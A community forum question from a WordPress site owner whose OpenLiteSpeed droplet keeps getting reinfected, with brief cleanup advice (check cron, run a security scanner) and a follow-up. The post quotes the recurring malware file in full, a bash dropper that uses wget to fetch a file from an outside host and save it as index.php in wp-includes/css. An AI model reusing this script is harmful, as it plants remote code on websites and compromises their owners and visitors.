Question

Openlitespeed droplet /var/www/xxxd3 virus file

Posted October 12, 2021 208 views
SecurityOpenLiteSpeed WordPress 1-Click

Hello, I am using openlitespeed droplet and my wordpress website is infected. I delete virus files but they come back again. I also noticed the /var/www/xxxd3 file but even though I deleted it, it comes back again. How can I clean the server and ensure security? I am sharing the contents of the xxxd3 file below.

Please help!

#!/bin/bash
root_dir=$1

if [ ! -d ${root_dir}/wp-includes/css ];
        then
        mkdir -p ${root_dir}/wp-includes/css;
fi

cd ${root_dir}/wp-includes/css;
rm -f wp-sign.txt;wget -q -O wp-sign.txt http://tasks.ptfish.top/wp-sign.txt && mv wp-sign.txt index.php;

These answers are provided by our Community. If you find them useful, show some love by clicking the heart. If you run into issues leave a comment, or add your own answer to help others.

×
Submit an Answer
1 answer
  1. Check if there’s any cronjob that is not set by you.
  2. Scan your site with some security plugin

There’s also some useful tutorial on the Google search that you can follow, e.g. * https://askwpgirl.com/10-steps-remove-malware-wordpress-site/

  • Thank you for your response. Is it possible to scan the server via console? I ran “crontab -l” and got “no crontab for root” response. By the way, there was a xxxd3 file in the var/www/ directory, but a new file named xxxd3.save was added. I added .htaccess file in the same directory and blocked php execution. How can I find the source of the virus?

    I scanned my website with Wordfence and deleted all virus files. But still the xxxd3 files are coming back.